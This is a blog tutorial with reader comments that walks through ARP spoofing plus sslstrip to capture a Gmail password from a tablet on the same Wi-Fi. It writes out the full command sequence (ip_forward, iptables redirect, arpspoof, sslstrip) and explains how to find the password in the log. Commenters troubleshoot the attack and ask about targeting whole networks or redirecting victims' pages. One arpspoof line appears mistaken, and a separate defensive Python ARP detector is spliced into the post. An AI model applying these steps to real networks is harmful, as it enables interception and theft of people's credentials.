ArpSpoofing and SSLstrip in Action.

Hello Bloggers.

For today I have a small example of how dangerous it can be to connect to one of those unsecured networks that so many of us like.

Today I am going to use ArpSpoofing together with Sslstrip to capture a Gmail password. To keep the environment more controlled, I have created an account called "testarp@gmail.com".

And since I don't much like preambles, let's get down to business.

I am not responsible at any time for what anyone may do with the following information. I do this exclusively for educational purposes.

ENVIRONMENT

For this test what we have is the following:

1. Attacker: my desktop computer, running Debian Wheezy. From the repositories you can install sslstrip and dsniff, which provides arpspoof.

2. Victim: an Android tablet that only wants to check its email through the browser.

3. The medium: my Cisco DPC2425 router.

ADDRESSES.

Attacker address: 172.26.0.2

Router Address: 172.26.0.1

Victim's Address: 172.26.0.8

THE ATTACK:

To understand a little more about how the attack works, you can go to my old POST.

The first thing we do for this attack is enable IP forwarding, so that our computer forwards the traffic on to the victim without them noticing (otherwise it would be a denial of service attack).

For that, and to redirect HTTP traffic (port 80) to port 8080, where sslstrip will be listening, we use:

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Each command in its own console window.

Now if we run tail -f desdelinux we see the information live.

snapshot1

So then how do we get what we want?

First, let's log in to our mail on the tablet. While logging in, we see thousands and thousands of lines scroll by in our console.

Now that it is finished, let's open our file "desdelinux" with nano:

nano desdelinux

and with Control + W we search for something called SECURE POST.

And we will see something like this.

snapshot2

Somewhere in that huge line, which does not fit on the screen, are the victim's email and password.

So we scroll to the right until we finally see the light at the end of the tunnel.

snapshot3

On another occasion we will see how we can protect ourselves a little from these attacks.
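As an added example (not code from the original post), here is a small Python detector for the two symptoms that the arpspoof commands above leave on the LAN: the router's IP suddenly answering from a different MAC, and one MAC claiming several IPs. The IPs are the post's; the MAC addresses and the replayed ARP replies are constructed sample values, standing in for what a sniffer or `arp -n` would feed it.

```python
"""ARP-poisoning detector, added as an example (not code from the original post).
Replays ARP replies against a baseline IP->MAC table learned on a clean LAN."""
from collections import defaultdict

GATEWAY_IP = "172.26.0.1"  # the post's router address

BASELINE = {  # constructed: the post's IPs with made-up MACs, learned before the attack
    "172.26.0.1": "00:11:22:aa:bb:01",  # router
    "172.26.0.2": "00:11:22:aa:bb:02",  # attacker's desktop
    "172.26.0.8": "00:11:22:aa:bb:08",  # Android tablet (victim)
}

# Constructed (sender_ip, sender_mac) replies in the order a sniffer would see them.
SAMPLE_REPLIES = [
    ("172.26.0.8", "00:11:22:aa:bb:08"),  # genuine reply from the tablet
    ("172.26.0.1", "00:11:22:aa:bb:02"),  # "router" now answers from the attacker's MAC
    ("172.26.0.1", "00:11:22:aa:bb:02"),  # arpspoof repeats it every few seconds
    ("172.26.0.2", "00:11:22:aa:bb:02"),  # attacker's own, legitimate reply
]


class ArpWatch:
    def __init__(self, baseline):
        self.ip_to_mac = dict(baseline)
        self.mac_to_ips = defaultdict(set)
        for ip, mac in baseline.items():
            self.mac_to_ips[mac].add(ip)
        self.reported = set()  # alert texts already raised, so repeats stay quiet

    def observe(self, ip, mac):
        """Feed one ARP reply; return the new alerts it triggers (possibly none)."""
        mac = mac.lower()
        found = []
        old = self.ip_to_mac.get(ip)
        if old is not None and old != mac:
            # An IP changing MAC is how the victim's cache gets poisoned; the gateway
            # moving is the hallmark (a DHCP lease change can also do it: investigate).
            found.append(f"{'HIGH' if ip == GATEWAY_IP else 'MEDIUM'}: {ip} moved from {old} to {mac}")
            self.mac_to_ips[old].discard(ip)
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        if len(self.mac_to_ips[mac]) > 1:
            # One interface answering for several IPs: the attacker's MAC claims the router too.
            found.append(f"MEDIUM: {mac} claims {sorted(self.mac_to_ips[mac])}")
        new = [a for a in found if a not in self.reported]
        self.reported.update(new)
        return new


def run_sample():
    """Replay the constructed capture and return the alert list (two alerts expected)."""
    watch = ArpWatch(BASELINE)
    return [a for ip, mac in SAMPLE_REPLIES for a in watch.observe(ip, mac)]
```

On a real network, feed `observe()` from a packet capture of ARP replies; a static ARP entry for the gateway on the client is the cheap mitigation the alert points at.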

Regards.



  1.   @Jlcmux said

    I take this opportunity to say that when the post was published, the commands were not right.

    The iptables command at the end is missing the 8080 which is on another line. And then the arpspoof commands were all on the same line. Each command being on a different line.

    Hopefully the editor sees it and can fix it.

    Greetings.

    1.    Manual of the Source said

      I have made the corrections you mention, is that okay?

      If you are going to insert code in an entry, use the HTML view, and check that the article is correct before sending it to pending. Thank you.

  2.   Luis said

    It is chilling to know that those of us who have no knowledge are so vulnerable. Very good information; even though I understand little of the subject, I realize its importance. Thank you!
    Regards

  3.   giskard said

    But that only works if the attacker and the victim are on the same network. In any case, it seems to me that if (being on the same network) you connect using HTTPS that does not happen because the data is encrypted BEFORE leaving your machine. If you connect by HTTP (without S) I think that even looking at the network cable you see the keys.

    1.    @Jlcmux said

      It is not true. I am hacking a gmail key and if you notice gmail uses https. So? The point is that although https is secure, it depends on http. So it is not so safe.

      Don't trust https so much; the S is not for Superman, it is for "secure".

    2.    Rten said

      It works with or without https; I have tried it with a more specialized Linux distro and it works without problems.

    3.    Manual of the Source said

      You can precisely use it to teach those who steal your Wi-Fi a lesson. 😀

      It is more or less like what they said a long time ago on Chema Alonso's blog:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant said

        Wow, great what it does! (And then they call me paranoid every time I use the VPN when they go to check their bank account...) By the way, you have to see how cynical people are in the comments... if in the end it is stealing...

        1.    eliotime3000 said

          Now we need to take a tutorial on how to create and offer your own VPN service.

      2.    Daniel said

        The story you link is very interesting, it even seems worthy of a novel, and it reminds me of when I used my neighbors' internet. Although I say I know the subject, I think I could never see the true dimensions of the danger it could have had. Fortunately for me, they only changed the password to WPA2, and that's where my story with the ISP began haha

    4.    Mauricio said

      That's why the title says Sslstrip in action.

      It works, as long as the attacker is in the middle

  4.   anon said

    What's up, do you work at PRISM? -.-
    No.
    What are you waiting for to send in your application XD
    Regards
    Good post

  5.   auroszx said

    Interesting, I'll do an educational test later ... Maybe I could even remove the password to the WiFi and have fun for a bit 😛
    By any chance, can you do something similar to send different pages to the ones the target requested? For example, they want to open Facebook and I redirect them to Google? 😛

    1.    @Jlcmux said

      Yes. But that's a whole different story.

      Maybe I'll post it later.

  6.   lastnewbie said

    Very good post, these topics are very educational. Now we need to be able to counteract this attack, since some of us (like me) connect to public networks (the university, for example); it would be helpful to know how to avoid it.

    Regards!

  7.   just-another-dl-user said

    It didn't work for me 🙁

  8.   wow said

    Something doesn't add up for me here. Apart from the fact that https connections are encrypted using a server certificate (once you have the certificate on your machine, your browser takes care of the encryption), with iptables you redirect port 80 (http), not 443, which is https.

    1.    @Jlcmux said

      I thought that too. The point is that although https is "secure" it unfortunately depends on http. So sslstrip takes advantage of that, it makes the browser believe that it is using https credentials but it is not.

      1.    wow said

        holy shit! But the browser should show a warning like "this certificate comes from a suspicious site" or something like that... I will definitely have to do some tests XD

        1.    @Jlcmux said

          No, absolutely nothing comes out.

  9.   just-another-dl-user said

    It finally worked for me
    I'm connected on a WEP network with password, and it showed me the password directly anyway.

    A query. Can you do this same procedure but for all the computers that are connected in the network, instead of having a single victim?

    1.    @Jlcmux said

      Yes you can. But I have not done experiments. Try it yourself and tell us how you are doing.

  10.   sinnick19 said

    The only thing I get with this is that the victim's machine goes offline, but sslstrip doesn't show me anything :/

    1.    @Jlcmux said

      You need to disable the firewall for a moment. Or at least enable incoming connections.

  11.   Mr Black said

    I tried it and I could only see the username and password of the Facebook page; in Gmail I found no result in the log. Also, I only needed one line of arpspoof: "arpspoof -i -t". On the other hand, the victim machine could not open some pages. I will keep investigating, it is very interesting. A tip for those who use Manjaro: the packages to install are dsniff (this is where arpspoof is), twisted and python2-pyopenssl. Sslstrip can be downloaded from here: http://www.thoughtcrime.org/software/sslstrip/
    To run it: $ python2 sslstrip.py
    Greetings.

  12.   Mr Black said

    It did not come out but the arpspoof line is: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert said

    Look, I do exactly what you say:

    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    The problem is that the victim, which is another PC I have here in my room, is left without a connection, to the point that I have to restart the router. What can I do? Help me.

    Another thing: I am working with a virtual machine, and when I run the iwconfig command, wlan0 does not appear, nor when I run ifconfig; however, I do have internet on my virtual machine, with an eth0 interface.